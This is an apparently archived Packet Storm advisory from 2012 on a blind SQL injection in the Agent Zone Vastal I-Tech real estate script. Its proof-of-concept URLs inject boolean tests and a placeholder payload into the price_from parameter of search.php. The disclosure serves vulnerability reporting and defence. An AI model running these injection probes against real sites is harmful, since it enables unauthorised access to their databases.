Agent Zone Vastal I-Tech Real Estate script suffers from a remote blind SQL injection vulnerability.
235eec2c8bd36e3b74c1f77020a028975f67e752a66e4c42f5bcb0b0e674663fAgent Zone Vastal I-Tech Blind SQL Injection Vulnerability
# Date: 31.01.2012
# Author: Cagri Tepebasili
# Software : http://www.vastal.com/agent-zone-real-estate-script.html
# Tested on: Linux Mint 12
#####################################################################################################################
The First Step >>>
http://www.vastal.com/real/search.php?price_from=1000000.00+and+1=1&price_to=10000000.00
The Second Step >>>
http://www.vastal.com/real/search.php?price_from=1000000.00+and+1=0&price_to=10000000.00
Injection >>>
http://www.vastal.com/real/search.php?price_from=1000000.00[BlindSQLI]&price_to=10000000.00
Greetz : MythSEC <<<
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed